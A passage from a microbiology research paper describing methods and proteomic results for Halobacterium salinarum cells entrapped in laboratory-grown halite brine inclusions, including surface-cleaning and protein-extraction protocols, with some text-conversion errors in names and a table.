Oxoid\({}^{\circ}\)p ptop034 and 0.5% (w/v) L-Arg HCl, adjusted pH 7.4) with a ratio of 10 mL TNPA buffer per 500 mg of cells (wet weight, equal to \(9.6\times 10^{11}\) cells). Then 20 mL TNPA crystallization buffer containing \(3.2\times 10^{11}\) cells was evaporated in each sterile 90/14.3 mm Petri dish in a 37\({}^{\circ}\)C with a 12 h:12 h light:dark photoperiod (66.75 umol photons.m\({}^{2}\).s\({}^{-2}\), verified by a Li-250A, Li-Cor Inc., Germany) to model natural brine-surfaces. Complete evaporation and drying of precipitated halte were obtained after ~22 days, followed by a further 60 days (2 months) of incubation to study the early phase of _H. Salinarum_ entrapment within halte brine inclusions. #### 2.2.2 Externally inoculated halte To produce halte with _H. Salinarum_ cells localized exclusively at the halte surface, 20 mL of sterile TN buffer was first evaporated as described above until complete drying (~22 days). The resultant crystals were then collected aseptically using sterilized forceps and the surfaces of each crystal inoculated with \(9\times 10^{9}\)_H. Salinarum_ cells in stationary phase, applied as a highly concentrated cell solution after centrifugation (7,500g, 10 min, room temperature, RT\({}^{\circ}\)C). Crystals were inoculated on the largest faces (designated here as "top" and "bottom") by first inoculating the "top" face with \(4.5\times 10^{9}\) cells drop-by-drop and spreading out using a sterile inoculating loop. Halite were then dried overnight at 37\({}^{\circ}\)C, followed by the "bottom" face the next day with the same protocol. ### Scanning electron microscopy Observations and analyses of halte crystals were performed by first attaching the crystals directly to aluminum supports with carbon tape followed by carbon thin coating. Observations were performed using a Zeiss Ultra 55 field emission gun scanning electron microscope (SEM-FG) equipped with a Bruker Energy dispersive X-ray spectroscopy (EDX) QUANTUM detector. Secondary and backscattered electron images and EDX analyses and maps were obtained at 10 kV and a working distance of 7.5 mm. ### Post-evaporation cellular viability tests To assess cell viability after halte inclusion, salt crystals were weighted to determine the appropriated NaCl concentration required for the complex medium to obtain a final concentration of 4.28 M after halte dissolution as previously described by Gramain et al. (2011). Halite and complex medium were then incubated at 37\({}^{\circ}\)C, 180 rpm. After crystal dissolution, culture OD\({}_{200}\) was measured by spectrophotometry. Pigmented (red) cultures reaching a normal stationary phase culture (OD\({}_{600}\) \(>\) 1.0) were classified as viable and cultures showing no increase in OD\({}_{100}\) after 1 month (OD\({}_{600}\) \(<\) 0.1) were classified as non-viable. ### Halte surface cleaning (removal of cells and proteins) #### 2.5.1 Cold atmospheric plasma treatment Cold atmospheric plasmas (i.e., weakly ionized gases) were generated were generated using either a dielectric barrier device (DBD) or an atmospheric pressure plasma jet (APPJ). They were polarized to the high voltage using two types of electrical power supply: (1) an alternative current (AC) generator composed of a function generator (ELC, GF467AF) and a power amplifier (Crest Audio, CC5500) as well as (2) a pulse generator (RLC electronic Company, NanoGen1 model) coupled with a high voltage power supply (Spellman company, SLM 10 kV, 1,200 W model). DBD and APPJ were supplied with different a carrier gas (helium or argon) with/without oxygen. Hence several plasma conditions were performed to produce active species (radicals, reactive oxygen species but also electrons and photons). The Table 1 details the experimental plasma conditions that were investigated as well as the resulting proteolysis to assess the efficiency of protein removal. #### 2.5.2 Chemical treatments Previous studies applied surface cleaning protocols developed for removal of cells and nucleic acids, as detailed in Supplementary Table 1. To adapt these protocols for the removal of surface-bound proteins, we modified the protocol of Sankaranarayanan et al. (2011) using shorter time for baths to avoid dissolution of smaller laboratory-grown crystals. Briefly, crystals were incubated \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline Plasma & \multicolumn{2}{c|}{Elec.parameters} & \multicolumn{1}{c|}{\multirow{2}{*}{**Gas \& Flow rate**}} & \multicolumn{1}{c|}{\multirow{2}{*}{**Proteo**}} \\ \cline{4-4} \cline{6-6} source & \multicolumn{1}{c|}{A} & \multicolumn{1}{c|}{F} & \multicolumn{1}{c|}{\multirow{2}{*}{**D\({}_{\text{c}}\)**}} & \multicolumn{1}{c|}{\multirow{2}{*}{**D\({}_{\text{c}}\)**}} & \multicolumn{1}{c|}{\multirow{2}{*}{**- lysis**}} \\ \cline{4-4} \cline{6-6} & & & & He (1 sm) & 0.00 \% \\ DBD & 7 & 500 & \multirow{2}{*}{-} & He-O\({}_{2}\) (1 sm, 150 sccm) & 0.00 \% \\ (**AC**) & kV & & Hz & He-O\({}_{2}\) (1 sm, 3 sccm) & 0.00 \% \\ \cline{4-4} \cline{6-6} & & & Ar (1 sm) & 0.00 \% \\ \hline APPJ & 7 & 700 & \multirow{2}{*}{-} & He (6 sm) & 0.00 \% \\ (**AC**) & kV & & Hz & & He (6 sm) & 29.30\% \\ \hline APPJ & 7 & 700 & \multirow{2}{*}{1\%} & He (6 sm) & 29.30\% \\ (**Pulse**) & kV & & Hz & He (6 sm, 100 sccm) & 39.10\% \\ \hline \end{tabular} \end{table} Table 1: Experimental parameters of cold plasma sources used to remove surface-bound proteins. in successive 5 min baths: 4.00%-4.99% NaCl (Honeywell Research Chemicals; avoiding commercial bleach solutions that induced rapid and near-complete crystal dissolution) in saturated NaCl and 10 M NaOH in saturated NaCl supplied or not with 10 N HCl followed by 100 mM Na\({}_{2}\)CO\({}_{3}\) in saturated NaCl. A sterile saturated NaCl was used to wash off each treatment solution between each successive bath, testing both passive wash baths and active-spray washes using a hemolytic pump. ### Protein extraction and preliminary desalting We optimized a protocol for protein extraction directly from halite crystals using TRIzol Reagent(tm) (Ambion, Life Technologies). TRIzol allows for the sequential separation of RNA and DNA prior to protein extraction (see Supplementary Figure 2-1). The protocol described below was based on both the manufacturer's protocol and that of Kirkland et al. (2006) used for protein extractions from liquid cultures of Haloferax volcanii. All steps described were performed with autoclaved glassware to avoid any organics contamination from plastics (bench top protocol see Supplementary Information Section 2). All solvents used for protein extractions were HPLC-grade and suitable for mass spectrometry analysis. Crystals were fully immersed in 5 mL of TRIzol reagent in 30 mL glass centrifuge tube and crushed using autoclaved glass stir-rod. After 20 min incubation at 60degC, total RNA was extracted from the resulting cell lysate by adding 1 mL of 100% chloroform, incubating for 5 min at room temperature followed by phase separation by centrifugation (10,000g, 20 min, 4degC). The chloroform-containing aqueous phase was removed with autoclaved glass Pasteur pipet and 1.5 mL of 100% ethanol was added to precipitate DNA. After 3 min at room temperature, supernatant was collected by centrifugation (2,000g, 10 min, 4degC). Proteins were precipitated with 7.5 mL of 100% isopropanol and collected by centrifugation (10,000g, 20 min, 4degC). The resulting protein pellet was washed twice to remove phenol traces using 5 mL of 0.3 M guanidine-HCl in 95% ethanol to denature the proteins, followed by a third wash step with 5 mL of 100% ethanol to remove any residual guanidine-HCl. Each wash step was performed by incubating the protein pellet in the solution for 20 min at room temperature followed by centrifugation (10,000g, 20 min, 4degC). Protein desalting was accomplished by two successive protein precipitations with 2 mL of 100% glacial acetone (-20degC) and centrifugation (10,000g, 20 min, 4degC). After acetone removal, the pellet was completely dried under laminar flow. Proteins were then solubilized in 1 M NaHCO, with 0.1% SDS at room temperature for 2 days and quantified with a bichichoninic acid (BCA) proteins assay (Pierce) using either bovine serum albumin (BSA) standards concentration from manufacturer's instruction for quantitative mass spectrometry or adapted BSA standard concentrations for low protein concentrations (see Supplementary Information Section 3) for evaluating removal of halite surface-bound proteins. Proteolysis rate was determined by proteins quantity comparison with and without treatments. Total proteins were extracted from _H. salinarum_ cultures in stationary growth stage using a similar procedure. For this, 2.0 x 10\({}^{10}\) cells from liquid cultures were pelleted by centrifugation (7,500g, 10 min, 20degC) and the cell pellets directly resuspended in 5 mL TRIzol prior to following all steps described above for halite samples. After solubilization of the protein pellet, solubilization with 1 M NaHCO\({}_{3}\) with 0.1% SDS at room temperature, protein quantification was performed using the BCA assay (Pierce) protein assays as per the manufacturer's instructions. ### ITRAQ(tm) isobaric labeling and mass spectrometry Aliquots of 100 ug of proteins for each sample condition and replicate were reduced using 2 mM of tris-(2-carboxytyl) phosphine (TCEP) at 37degC for 1 h, and alkylated with 5 mM of iodoacetamide 30 min in the dark at RT\({}^{\star}\)C prior to digestion with 5 ug of trypsin Gold (Promega) for 15 h at 37degC. After digestion, additional desalting of peptides was done directly by solid phase extraction (SPE) using C18 cartridges (Sep-Pak C18 Plus Short 400 mg Sorbent, Waters). The resulting peptides were dried by speed-vac and resuspended in tetraethylammonium bromide (TEAB) 0.5 M prior to labeling. ITRAQ\({}^{\star}\) labeling was performed according manufacturer's instructions (Applied Biosystems). Briefly, each of the ITRAQ\({}^{\star}\) isobaric labeling reagents were reconstituted with isopropanol and then added to the 50 ug of protein digest (113, 114, 115, and 116 ITRAQ\({}^{\star}\) isobaric labels for proteins from liquid controls and 117, 118, 119, and 121 for halite brine inclusions protein extractions). After 2 h at room temperature, samples were desalted again with C18 SPE. The labeled peptides eluted were then dried by speed-vac and resuspended in 2% acetonitrile, 98% H\({}_{2}\)O with 0.1% formic acid (see Supplementary Information Section 4 for additional details). Labeled peptide samples were analyzed by mass spectrometry as previously described (Pinel-Cabello et al., 2021) on a Q Exactive HF tandem mass spectrometer (Thermo Scientific) coupled to an UtiMate 3000 Nano LC System. Peptides were desalted online on an AcclaimPepmap100 C18 precolumn (5 um, 100 A, 300 um i.d. x 5 mm) and further resolved on a nanoscale AcclaimPepmap100 C18 column (3 um, 100 A, 75 um i.d. x 500 mm) at a flow rate of 200 nl.min\({}^{-1}\) using a 120-min gradient of 4%-32% acetonitrile. A Top 20 strategy was applied in data dependent acquisition mode. Full scan mass spectra were acquired from 350 to 1800 m/z at a resolution of 60,000 with an automatic gain control (AGC) target set at 3 x 10\({}^{6}\) ions. MS/MS fragmentation was initiated when the ACG target reached 105 ions with an intensity threshold of 9 x 10\({}^{4}\). Only precursor ions with potential charge states of 2\({}^{\star}\) and 3\({}^{\star}\) were selected for fragmentation applying a dynamic exclusion time of 10 s. ### Mass spectrometry data analyses #### Protein identification Protein identifications were performed using PEAKS* X-Pro software (64 bits version, 2020, Bioinformatics solutions). It allows database search assisted de novo sequencing against the protein coding sequences from _H. salinarum_ NRC1 (8,533 entries from NCBI, download date 2021/08/03). Spectral peptides matching was carried out with the following parameters: (1) mass tolerance of 10 ppm on the parent ion, (2) mass tolerance of 0.005 Da for fragment ions from MS/MS, (3) carbamidomethylated Cys (+57.0215) and ITRAQ* isobaric tag Lys and N-terminal (+304.2054) as fixed modifications; and (4) oxidized Met (+15.9949), deamidated Asn and Gln (+0.9840) and ITRAQ* isobaric tag Tyr (+304.2054) as variable modification. The false discovery rate (FDR) was estimated with decoy-fusion option included in the software. Proteins were then filtered with FDR < 1% (corresponding to a -10logP score above 25) for peptide-spectrum matches (PSMs) and a valid protein identification required minimum 2 unique peptides with a -10logP score above the peptide filtering threshold that can be mapped to only one protein group. #### Protein ITRAQ* quantitation The eight labeled samples (four replicates each of proteins from liquid stationary cultures and from halite brine inclusions) were mixed in equimolar ratios and injected in nanoLC-MS/MS in triplicate to reduce instrument variability as previously described. Quantitation was performed using PEAKS Q (quantitation program) ITRAQ 8-plex type with 10 ppm mass tolerance and only peptides with a score above FDR threshold 1% are used to quantify the identified proteins. Resulted quantitation was filtered accepting only proteins groups with fold change z2, at least two unique peptides and FDR adjusted 51% for both proteins identification and fold change significance using ANOVA significance method. Mass spectrometry proteomics data have been deposited to the ProteomeXchange Consortium via the PRIDE partner repository with the dataset identifier PKDO37167 (project DOI: 10.6019/PXD037167). #### Sample comparisons and functional annotation Potential biases during analysis were avoided by filtering protein identifications produced using the PEAKS software to group proteins having multiple annotations in the NCBI database. To do so, we developed custom BASH and PYTHON scripts to merge all descriptions for one proteins identifier (favoring in order AAG-type, DAC-type, WP-type and then QBH-type identifier). Venn diagrams were computed with VennDiagram and ggplot2 packages in R script. Functional proteins annotation was done with Kyoto Encyclopaedia of Genes and Genomes (KEGG, Kanehisa and Goto, 2000) using blastKOALA tool (Kanehisa et al., 2016; [https://www.kegg.ip/blastKOALA/](https://www.kegg.ip/blastKOALA/)), assigning KEGG Orthology identifier (also called K numbers) to identified proteins (see Supplementary Table 6-2). K number were then used for mapping identified proteins onto pre-existing metabolic pathways using KEGG - Mapper search - tools ([https://www.kegg.ip/kegg/mapper/search.htm](https://www.kegg.ip/kegg/mapper/search.htm)); see Supplementary Table 6-3). ## 3 Results ### Characterization of laboratory-grown halite containing _Halobacterium salinarum_ In order to study the physiology of _H. salinarum_ cells after entombment within brine inclusions, we first needed to characterize the laboratory-grown halite, including resultant crystal size, cell localization, and surface-bound biomolecules. This enabled the establishment of selection criteria for downstream proteomics analyses and the development of protocols to exclude any "contaminant" proteins from the surface of the crystal. #### Variability of _Hidobacterium salinarum_ cells from inoculated laboratory-grown halite Laboratory-grown halite crystals produced from TNPA solutions containing _H. salinarum_ cells using a slow evaporative process exhibited heterogeneous crystallization with respect to crystal size and coloration. As shown in Figure 1, even replicates produced under the same conditions produced different quantities of crystals of varying lengths and widths, but with relatively uniform thicknesses (\(\pm\)1 mm) of hopper and fishtail crystals. Color variations observed for halite in this study were likely the result of heterogeneities in the number of brine inclusions containing pigmented Halobacterium cells. The red color indicative of _H. salinarum_ cells tended to concentrate in the center of hopper crystals where inclusions were most abundant (Roedder, 1984). Individual crystals of similar size and coloration were collected aseptically for further study, selecting only halite without visible defects signaling potential rupture of near-surface brine inclusions. Figure 1: TNPA laboratory-grown halite crystals internally inoculated with Halobacterium salinarum cells observed after two months of incubation at 37°C for crystallization replicates 1–3 (A–C, respectively). #### 3.1.2 Contaminating surface-bound cells and proteins To evaluate the potential for 'contaminating' microbial cells or residual biomolecules at the crystal surface, the elemental composition of halite with and without _H. salinorum_ cells (Figures 2**A**, **B**, **G**, **H**, **K**, **L**) were determined by SEM-EDX. Elemental analyses of control halite derived from evaporation of the TNPA solution only exhibited the expected sodium chloride crystal surface, along with dense, irregular \(\alpha\) agglomerates (Figures 2**C**-**F**) derived from the presence of organics (perptone, **L**-**A**) in the TNPA solution. The addition of _H. salinorum_ cells to the TNPA solution prior to evaporation produced similar structures to control crystals, with no intact cells of _H. salinorum_ visible on halite surfaces (Figures 2**I**, **J**). However, EDX analyses revealed differences in the distribution of carbon compared to control samples, as well as the presence of microscopic KCl crystals at the halite surface (Figures 2**I**, **B**) that were not found on control TNPA-derived crystals without _H. salinorum_ cells. These differences were due to lysis of surface adhered _H. salinorum_ cells releasing high concentration of cytosolic K- and CI- accumulated as part of the "salt-in" osmoadaptation strategy (Engel and Catchpole, 2005). In order to assess both the potential for surface bound contaminants, including viable cells as well as proteins, externally inoculated halite were produced (Figure 2**K**). After these externally inoculated halite crystals were dissolved in growth medium and incubated at 37 \({}^{\circ}\)C, 180 rpm to assess viability. Such cultures reached a normal stationary phase culture (OD\({}_{\text{iso}}>1.0\)), demonstrating that at least a sub-population of halite surface-attached cells were viable. Additionally, SEM-EDX analysis of externally inoculated crystals revealed a similar elemental composition and distribution to that of internally inoculated halite (bearing cells both within brine inclusions as well as on the halite surface) after two months post-evaporation (Figures 2**M**, **N**). Taken together, these results confirm the presence of both viable cells and cellular debris on the surface of halite after two months of desiccation, validating the need for halite surface cleaning procedure to remove any residual proteins. Figure 2: Laboratory-grown halite surface observation. [_A_–_F_] TNPA crystals without cells. [_G_–_I_] _Internally inoculated TTPA crystals with Halobacterium salinorum cells incubated 2 months at 37\({}^{\circ}\)C. [_A_, \(G\), _K_] _Schematic representation of halite crystals without cells, internally inoculated and externally inoculated, respectively. [_B_, **H**, **L**) Visual observation of crystals without cells, internally inoculated and externally inoculated, respectively. [_C_, _G_] _Secondary electron images. [_I_, **M**] _Backscattered images. [_D_, \(F\), \(J\), _N_] _Elemental composition analysis by EDX spectroscopy correlated, respectively, to the SEM images in panels **C**, **E**, **I**, **M**. Carbon and potassium appear in red and yellow, respectively. ### Development of total protein isolation methods for halte For proteomics approaches, a new methodology was developed. This method was based on the protocol of Kirkland et al. (2006) using TRIzol reagent. Briefly, protocol was modified to optimize desalting steps (due to direct halte extraction with high NaCl content), protein pellet dissolution and protein digestion (see Supplementary Information Section 4 for details on the parameters tested during protocol development and optimization). To ensure that only proteins contained within fluid inclusions are extracted using this protocol, it was also necessary to develop methods to remove contaminating proteins from halte crystal surfaces. ### Development of proteolysis protocols for removal of halte surface-bound contaminants Previous halte cleaning procedures from Gramain et al. (2011) and Sankaranarayanan et al. (2011) (see Supplementary Table 1-1) were developed to deactivate surface-contaminating microorganisms and remove surface-contaminating DNA. However, these methods were not designed for the removal of other types of biomolecule contaminants, such as proteins. A new, modified surface cleaning procedure was therefore needed to remove surface protein contamination to enable extraction of proteins only from within halte brine inclusions while avoiding crystal dissolution during the cleaning process. To meet these requirements, both cold plasma treatments and chemical protocols were tested using externally inoculated halte. Cold plasma exposure is routinely used in astrobiology to sterilize spacecraft surfaces of microbial contaminants prior to launch. For this reason, a cold plasma approach was investigated here for the decontamination of halte surface. Two plasma sources - a DBD and an APPJ - were tested as an alternative to conventional liquid solvents. The expected benefit was to minimize halte dissolution-recrystallization events, hence ensuring the survival of the microorganisms within the halte. However, owing to their insulating properties and irregular topography, halte crystals attenuate plasma electric field and/or bend its field lines. As a result, and whatever the implemented plasma treatment (Ar, He, He mixed with O\({}_{2}\)), the externally inoculated halte crystals still retained the pink coloration which is indicative of the protein and lipid pigments of \(H\). _salinarum_ cells (data not shown). As shown in Table 1, the most efficient plasma treatment drove to partial cell lysis (as determined by culture-based viability tests following growth by OD\({}_{0}\)d) and to a proteolysis of only 39.1% based on extraction and quantification of remaining proteins from halte surfaces using a modified BCA assay for low protein quantities; a value that remains insufficient for the application. As an alternative, chemical treatments were tested, using protocols modified from the microorganism deactivation and DNA removal treatments of Sankaranarayanan et al. (2011) to extend to proteolysis. First, reduction of the exposure times in each chemical bath from previously published protocols were tested to avoid crystal dissolution, while maintaining the use of NaCl-saturated chemical solutions to avoid crystal dissolution. Subsequent, 5-min sequential NaCl and NaOH treatments, either with or without additional HCl treatments, resulted in insufficient halte surface proteolysis (Supplementary Figure 5-1a). This was likely due to the rough structure of hopper crystals, which could allow proteins to remain attached during passive chemical baths. After chemical treatments partially degraded the contaminating biomolecules and reduced their attachment to the halte surface, an active-spray method was used for wash steps to increase the efficiency of biomolecule removal and prevent re-association with halte surfaces, compared to the use of passive wash baths (Supplementary Figure 5-1b). This active-spray method also allowed for both deactivation of halte surface-bound microorganisms (as indicated by a lack of culture growth in post-treatment viability tests) and better protein lysis compared to passive chemical bath washes. Using the protein extraction method described above, the efficacy of active-spray method for removal of surface-bound proteins was tested comparing NaCl-NaOH and NaOCl-NaOH+HCl protocols. A shown in Figure 3A, addition of an acid wash results in a proteolysis efficiency of \(93.0\pm 4.3\%\), compared to from of \(83.7\pm 15.9\%\) without the HCl treatment step (residual proteins \(51.6\pm 31.6\) \(\mathrm{\SIUnitSymbolMicro g}\) and \(120.5\pm 117.6\) \(\mathrm{\SIUnitSymbolMicro g}\), respectively, \(\mathrm{n=3}\)). These results suggest that NaOCl-NaOH+HCl active-spray washes protocol (Figure 3B) present optimal and more consistent surface proteolysis, particularly for the small laboratory-grown halte crystals used in this study. To ensure that this active-spray chemical treatment did not affect _H. salinarum_ cells within the halite brine inclusions, growth was monitored for crystals containing cells trapped in brine inclusions after surface chemical cleaning with active-spray NaOCl-NaOH-HCI treatment. Viable cultures were obtained from dissolution of the crystals in CM growth medium, thereby validating the active-spray chemical surface protein removal protocol for use in studying biomolecules within halite brine inclusions. These new methods for removal of surface-bound proteins followed by extraction of total proteins from halite brine inclusions using a modified TRIzol-based method with desalting were then applied to answer the question of how _H. salinarum_ acclimates to halite brine inclusions over the initial phase post-evaporation using proteomics. ### Proteomic shifts in _Halobacterium salinarum_ induced by acclimation to halite brine inclusions Total proteins were extracted from the brine inclusions of halite after two months of complete dryness, with surface-bound proteins removed using the new protocol detailed above. These brine inclusions extracts were compared to total proteins extracted from _H. salinarum_ cultures in stationary growth phase, representing conditions prior to halite formation. The proteins unique to each condition, as well as the common proteome between liquid cultures and from halite interiors were analyzed to determine how _H. salinarum_ acclimates to halite brine inclusions. Using the mass spectrometry data of four replicates from each condition, 1,249 total proteins were identified from stationary phase liquid cultures and 1,052 from halite brine inclusions, representing 1,342 unique proteins. Comparisons of the four replicate samples per condition revealed a core proteome composed of 839 proteins common to all sample replicates for liquid cultures and 715 proteins for halite brine inclusions extracts (Figures 4A, B). Of these, 655 proteins were expressed by cells both in liquid cultures and within halite brine inclusions (hereafter referred to as "shared proteins"); while 60 were specific to halite brine inclusions samples and another 184 were only identified from liquid cultures (Figure 4C; Supplementary Table 6-1). KEGG blastKOLA searches provided matches for roughly 75% of these shared proteins (488 of 655 shared proteins), as well as 62% of proteins unique to halite brine inclusions samples (37 of 60 proteins) and 52% of proteins unique to liquid cultures (95 of 184 proteins; see Supplementary Table 6-2), allowing for functional pathway reconstruction (see Supplementary Table 6-3). Figure 3: Surface-bounded protein removal by chemical treatments with active-spray washes. (A) Percentage of proteins removed after NoOCl-NaOH treatment with or without an additional HCI treatment step, and subsequent residual protein quantity. (B) Overview of optimal NoOCl-NaOH-HCI chemical treatment with active-spray washes. As a qualitative approach is insufficient to determine the regulation of proteins leading to their differential expression for \(H\). _solinorum_ cells within halte brine inclusions, a semi-quantitative mass spectrometry analysis was also performed. Results from all three injections were pooled to reduce instrument variability (Figure 5). Subsequently 68 proteins from halte brine inclusions were identified with statistically significant changes in expression levels compared to liquid cultures (fold change z2; see Supplementary Table 6-4 and Supplementary Figure 6-1). KEGG blastKOALA searches provided functional pathway results for 80% of down-regulated proteins (35 of 44 proteins) and 71% of up-regulated proteins (17 of 24 proteins; see Supplementary Table 6-2). A summary of the proteomics results is shown in Figure 6 (and Supplementary Table 6-5), showing shared proteins between cells from the stationary growth phase cultures and brine extracts as well proteins differentially expressed (up- or down-regulated) in halte-derived samples. Investigations of the cell activity targeted proteins involved in central metabolism, energy production, cell division, replication, transcription and translation pathways. The cell interactions with the closed halte brine inclusions microenvironment were examined via cell envelope proteins (surface layer cell wall proteins and transporters) as well as proteins involved in the motility processes (chemotaxis, gas vesicle and archaeellum). #### 3.4.1 Retention of proteins for central metabolism Proteins involved in central metabolism, including key enzymes involved in glycolysis/glucoseogenesis and the TCA cycle, formed part of the shared proteome between halte brine inclusions extracts and stationary phase liquid cultures (Figure 6; Supplementary Table 6-5). Additionally, proteins involved in arginine fermentation and aerobic respiration were shared between halte brine inclusions and stationary growth phase liquid cultures. Quantitative analyses showed that the majority of proteins involved in pyruvate metabolism maintained consistent expression levels after two months of halte inclusion with the exception of up-regulation of proteins involved in acetyl-CoA production. Surprisingly, transporters and enzymes involved in ADI pathway were expressed by both cells in stationary phase liquid cultures and brine inclusions extracts, including the arginine deaminase, ornithine-carbamoyl transferase, carbamate kinase, arginosuccinase, arginosuccinate synthetase, arginine-ornithine antiporter and an lcIR family transcriptional regulator. Only arginine deaminase was found significantly up-regulated for cells from halte brine inclusions. Proteins for key components of the electron transport chain, including NADH dehydrogenase/oxidoreductase subunits B, C, D, and L, NAD(P)/FAD-dependent oxidoreductase, succinate dehydrogenase and ATP synthase subunits A, B, C, D, E, H, and I were not found to be differentially regulated between cells from free-living (liquid cultures) or trapped within halte brine inclusions (with the exception of with F subunit lacked in one brine inclusions extract). Figure 4: Venn diagrams of proteins identified by mass spectrometry for brine inclusions and liquid stationary culture samples. (A) Comparison of biological replicates for liquid stationary culture extracts. (B) Comparison of biological replicates for brine inclusions extracts. Black circles in (A,B) represent “core” proteins shared by the four replicates in both cases. (C) Comparison of core proteins between brine inclusion extracts and liquid stationary culture cells. Figure 5: Venn diagram of the 68 proteins quantified by TRAQ® with triple injection which exhibit significative differential expression in brine extracts compared to liquid stationary culture cells. #### 3.4.2 Similar expression of DNA repair replication, and cell division proteins Eight proteins involved in chromosome partitioning were common to halte brine inclusions extracts and stationary growth phase cultures, along with 11 other proteins involved in DNA replication including matches for DNA primase, polymerase, gyrase, topoisomerase and replication factors. Only four DNA replication proteins were found to be specific to stationary growth phase proteomes. DNA repair processes were represented both within halte brine inclusions and liquid cultures by the DNA photolyase, Rad50, the UrvD repair helicase, UrvA exonuclease, RadA recombinase, Rad25 DNA repair helicase, Fen1 repair endonuclease and the Hel208 helicase are found shared between liquids and brine extracts. Other DNA repair proteins were specific to either halte or liquid samples. Stationary growth phase cultures contained additional repair proteins including the RmeR site-specific deoxyribonuclease, endonuclease IV, Recl single-strand exonuclease, Mutl mismatch repair protein, DNA gyrase and N-glycosase, whereas the UrvB, MutS and endonuclease III proteins were exclusive to halte brine inclusions proteomes. #### 3.4.3 Shared transcriptional but reduced translational proteomes Investigations of DNA transcription identified a shared proteome between liquid cultures and brine inclusions including proteins for transcriptional initiation factors (TRIE and TFID) and transcriptional machinery (RNA polymerase subunits RpoAZ, RpoB1, RpoB2, RpoD, and RpoE1). Proteins involved in transfer RNA biogenesis such as tRNA ligases for 18 different amino acids along with two ribonucleases completed the shared transcriptional proteome of liquid cultures cells and halte extracts. Only tRNA ligases specific for tryptophan and threonine, four unique transcriptional proteins (RpoF, RpoH, RpoN, and RusA termination protein) and one unique transcription initiation factor (TFiIB) were only found only in stationary growth phase cell extracts. Translational activities were severely restricted for cell within halte brine inclusions, as evidenced by the down-regulation of 27 Figure 6: Schematic overview of targets cellular functions involved in early acclimation of Halobacterium salinarum through halte brine inclusions (for extended matched proteins, see Supplementary Table 6-5). Shared (*) indicates proteins found in all four brine inclusion extracts and all four liquid stationary culture extracts. Partially shared (**) indicates proteins found in both brine inclusions and stationary phase liquid cultures, but not for all replicate samples for each condition. of the 42 ribosomal proteins shared by cells from both conditions tested. Only one ribosomal protein was up-regulated. The shared proteome between cells in halite brine inclusions and those in liquid culture included an additional 10 proteins involved in ribosome biogenesis, and 10 translation initiation factors for which none showed any significant up- or down-regulation. We attempted to corroborate the low ribosomal abundances by isolating RNA using the same TRIzol-based method (see Supplementary Figure 2-1). However, the RNA obtained from halite samples was of too low quality and quantity compared to that from liquid cultures (see Supplementary Table 8-1) for quantitative and transcriptional analyses. This was likely due to a combination of low RNA abundance in the halite fluid inclusions (based on ribosomal protein abundances) and some RNA degradation during extraction due to inefficient desalting using TRIzol alone (see Supplementary Information Section 8 for further details). Chaperones proteins showed a high degree of conservation between conditions, with thioredoxin, chaperone DnaJ, DnaJ along with the GPPE stimulator, Hsp20, chromosome subunit and prefoldin all shared by both liquid and halite extracts. Only prefoldin beta subunit was down-regulated for cells from halite brine inclusions. #### 3.4.4 5-layer maintained with minor cell envelope proteome changes in brine inclusions S-layer proteins were identified in all liquid culture and halite samples without significant up- or down-regulation. Of the 20 membrane transporters shared between the proteomes of liquid cultures and cells inside halite brine inclusions, four were found to be up-regulated in halite brine inclusions extract, including the Ugp8 glycerol-3-phosphate-binding protein precursor. Moreover, six proteins were found to be unique to the halite brine inclusions proteome, with up-regulations of the phosphate, iron, peptide/nickel, and glycerol-3-phosphate transporters. #### 3.4.5 Modified sensory detection and motility A high degree of variability was noted in the expression of these proteins between halite brine inclusions extracts and stationary growth phase cultures. Some proteins were common to both proteomes without any differences in protein quantities, including for the gas vesicle protein (Gvp) subunits F, C, N of cluster A, while GvpA was found only in two of the four liquid cultures and two of four halite samples. GvpD and I subunits of A cluster and F of B cluster were found punctually in liquid samples. However, the GvpO cluster A and B were significantly down-regulation in halite brine inclusions extracts. The bacterio-opsin activator-like protein (Bat HTH-10 family transcription regulator; AAG 18778.1), along the 11 Htr signal transducers (including Htr-l and Htr-ll that accompany the two sensory rhodospins) were common to all conditions and replicates. In contrast, the bacterio-opsin activator (Bat; AG19769.1) was only found in two of the four halite brine inclusions replicate samples. While this protein is hypothesized to be a DNA-binding transcriptional regulator in the photosensor network, its role remains unconfirmed. For the archaellum proteins, only archaellin B1 was down-regulated in halite samples whereas archaellin A1 and prearchaellin peptidase were identified punctually in liquid culture samples. Archaeillin B2, A2 and flagellin related H protein were found in all liquid culture replicates but only in one halite replicate. An examination of chemotaxis proteins showed that the 18 identified proteins including CheR, CheA, CheW, CheC, CheB, and the methyl-accepting chemotaxis (MCP)-family proteins Htr transducers, were shared between halite brine inclusions extract and stationary growth phase liquid cultures. ## 4 Discussion The initial objective of this study was to determine the molecular acclimation of haloarchae to entrapment within halite brine inclusions using a proteomics approach. To this aim, we first needed to (1) better characterize the process of laboratory-based evaporation for halite entrapment of haloarchae and its effects on both the resulting halite and the microbial cells, (2) develop efficient methods for the removal of halite surface-bound cells and biomolecules in order to isolate only proteins contained within the brine inclusions, (3) develop effective methods for protein extraction directly from halite brine inclusions in a shorter time period to avoid alterations in protein expression that can occur during gradual salt dissolution, and finally (4) combine these approaches to analyze total proteins from _H. salinorum_ extracted from halite brine inclusions and compare these to control samples from stationary phase liquid cultures in order to propose a model of acclimation within halite. A slow evaporative process was chosen to generate the internally inoculated halite to model natural processes that occur over time scales sufficient for cellular acclimation to the environmental changes, rather than a rapid "shock" evaporative process. ### Biotic/abiotic interactions influencing halite formation and _H. salinorum_ viability Similar to previous studies of survival of halophiles within halite brine inclusions, a NaCl-based buffered evaporation solution was used in this study (Norton and Grant, 1988; Fendrishan et al., 2012; Kirmuller and Greie, 2012). However, here we chose to add nutrient sources (1% peptone, 0.5% L-Arg HCI) to simulate organics present in the natural environment. This enabled us to study the role of metabolism in the survival and acclimation processes of _H. salinorum_ cells to the early phases of entrapment within halite brine inclusions. The presence of microbial biomass and additional organics can affect halite precipitation processes and also explain the observed crystallization heterogeneity observed. For example, Norton and Grant (1988) previously demonstrated a positive correlation between the initial microbial cell density in liquid culture and the quantity of halite brine inclusions formed during evaporation. The presence of nutrients seemed to diminish rather than increase the duration of survival. While Gramain et al. (2011) observed growth of _H. salinorum_ NRC-1 after 27 months post-entombed in halite, there were some notable differences in the experimental parameters used. Gramain et al. (2011) used evaporation buffers with different compositions of nutrients to the evaporation buffer (either without nutrients or with addition of 0.01% Difco yeast extract and 0.0075% Merck casein hydrolysate diluted from the standard concentrations in modified Payne's medium of 1% and 0.75%, respectively (Payne et al., 1960), incubated the resulting salt crystals in the dark at room temperature rather than with 